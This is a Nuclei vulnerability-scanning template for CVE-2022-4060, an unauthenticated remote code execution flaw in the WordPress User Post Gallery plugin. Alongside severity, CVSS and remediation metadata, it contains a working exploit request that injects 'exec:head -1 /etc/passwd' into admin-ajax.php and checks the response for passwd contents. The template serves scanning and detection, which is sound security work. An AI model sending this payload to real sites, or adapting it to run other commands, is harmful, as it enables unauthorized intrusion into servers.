nuclei-templates/http/cves/2022/CVE-2022-4060.yaml

58 lines
2.1 KiB
YAML

id: CVE-2022-4060
info:
name: WordPress User Post Gallery <=2.19 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
remediation: |
Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
- https://wordpress.org/plugins/wp-upg/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4060
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4060
cwe-id: CWE-94
epss-score: 0.02055
epss-percentile: 0.87767
cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: odude
product: user_post_gallery
framework: wordpress
tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg,odude
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- "recordsFiltered"
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100aa7bbc4c43e029e3b8c854dc20579f075093e4e54bb74a34976da06e1e6a547c0220594d5121fb28ab2279c6e377a6cda8bdb5003437fae9bb8ba1d6058ff5f907d2:922c64590222798bb761d5b6d8e72950